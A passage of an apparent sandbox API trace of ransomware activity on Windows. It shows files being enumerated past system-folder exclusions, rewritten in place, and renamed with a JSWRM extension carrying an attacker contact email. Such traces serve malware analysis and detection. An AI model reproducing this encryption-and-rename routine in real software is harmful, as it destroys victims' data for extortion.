[0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00459_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00459_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0077.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0077.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.544] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17406) returned 1 [0077.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x43f0) returned 0x24d210 [0077.544] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x43f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x43f0, lpOverlapped=0x0) returned 1 [0077.547] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.547] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x43f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x43f0, lpOverlapped=0x0) returned 1 [0077.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.547] CloseHandle (hObject=0x314) returned 1 [0077.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0077.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0077.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0077.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.548] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0077.548] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00543_.WMF", cAlternateFileName="")) returned 1 [0077.548] lstrcmpiW (lpString1="FD00543_.WMF", lpString2=".") returned 1 [0077.548] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="..") returned 1 [0077.548] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="...") returned 1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="windows") returned -1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="recovery") returned -1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="perflogs") returned -1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="documents and settings") returned 1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="system volume information") returned -1 [0077.549] lstrcmpiW (lpString1="FD00543_.WMF", lpString2="msocache") returned -1 [0077.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00543_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00543_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00543_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0077.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00543_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00543_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00543_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0077.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0077.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.549] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1472) returned 1 [0077.549] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5c0) returned 0x2332c0 [0077.549] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5c0, lpOverlapped=0x0) returned 1 [0077.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.551] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5c0, lpOverlapped=0x0) returned 1 [0077.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0077.551] CloseHandle (hObject=0x314) returned 1 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0077.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0077.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0077.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0077.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0077.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0077.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.552] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0077.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.552] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x148c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00544_.WMF", cAlternateFileName="")) returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2=".") returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="..") returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="...") returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="windows") returned -1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="recovery") returned -1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="perflogs") returned -1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="documents and settings") returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="system volume information") returned -1 [0077.552] lstrcmpiW (lpString1="FD00544_.WMF", lpString2="msocache") returned -1 [0077.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0077.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00544_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00544_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00544_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0077.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0077.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00544_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00544_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00544_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0077.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0077.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0077.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.553] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5260) returned 1 [0077.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1480) returned 0x205850 [0077.553] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1480, lpOverlapped=0x0) returned 1 [0077.555] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.555] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1480, lpOverlapped=0x0) returned 1 [0077.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.555] CloseHandle (hObject=0x314) returned 1 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0077.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0077.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0077.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0077.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0077.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0077.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0077.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.556] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00564_.WMF", cAlternateFileName="")) returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2=".") returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="..") returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="...") returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="windows") returned -1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="recovery") returned -1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="perflogs") returned -1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="documents and settings") returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="system volume information") returned -1 [0077.556] lstrcmpiW (lpString1="FD00564_.WMF", lpString2="msocache") returned -1 [0077.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00564_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00564_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00564_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0077.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00564_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00564_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00564_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0077.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0077.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0077.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.557] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=896) returned 1 [0077.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x380) returned 0x20e550 [0077.557] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, 